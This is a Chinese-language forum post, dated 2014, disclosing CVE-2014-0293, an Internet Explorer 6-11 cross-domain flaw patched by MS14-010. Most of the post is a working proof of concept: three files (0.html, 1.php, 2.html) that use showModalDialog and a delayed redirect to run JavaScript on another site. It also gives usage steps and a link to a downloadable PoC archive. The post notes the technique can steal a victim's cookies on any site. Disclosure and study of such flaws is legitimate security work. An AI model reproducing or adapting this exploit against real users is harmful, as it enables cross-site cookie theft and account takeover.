CVE-2014-0293

admin · 发表于 2014-3-29 11:44:58

相关补丁：http://technet.microsoft.com/en-us/security/bulletin/ms14-010
漏洞作者：Dieyu
技术细节：用showModalDialog来维持script的执行，跳转至目标站，通过特殊手段最终在目标站点执行Javascript.
影响范围：IE6-11
PS：这个应该算是神跨域了。换句话来说，只要受害者打开了你特定的网页，你就有可能偷走受害者在任何站点上的cookies。

相关代码：

0.html

<script>
function go()
{
i.execScript("showModalDialog('2.html',window).location='javascript:alert(document.domain)';");
}
</script>
0.html<br>
<a href="#" onclick="go();">Go</a><br>
<iframe id=i width=500 height=500 src="1.php"></iframe>

复制代码

1.php

<?php
sleep(5);
header("Location: http://www.google.co.uk/robots.txt");
?>

复制代码

2.html

2.html
<script>
returnValue = menuArguments;
setTimeout("window.close()",6000);
</script>

复制代码

补充说明：打开0.html在5s内点击Go,然后会弹出来窗口，询问你是否关闭。如果无法关闭，手动关闭后即可在目标域名下执行指定的javascript.

POC：http://dieyu.org/insider2.zip
SHA1: f50b5aebdc7cd0a62f1ed97d776fe4b7fa47260e
MD5: bfdaa2a329ea639a363a4ba8c294f706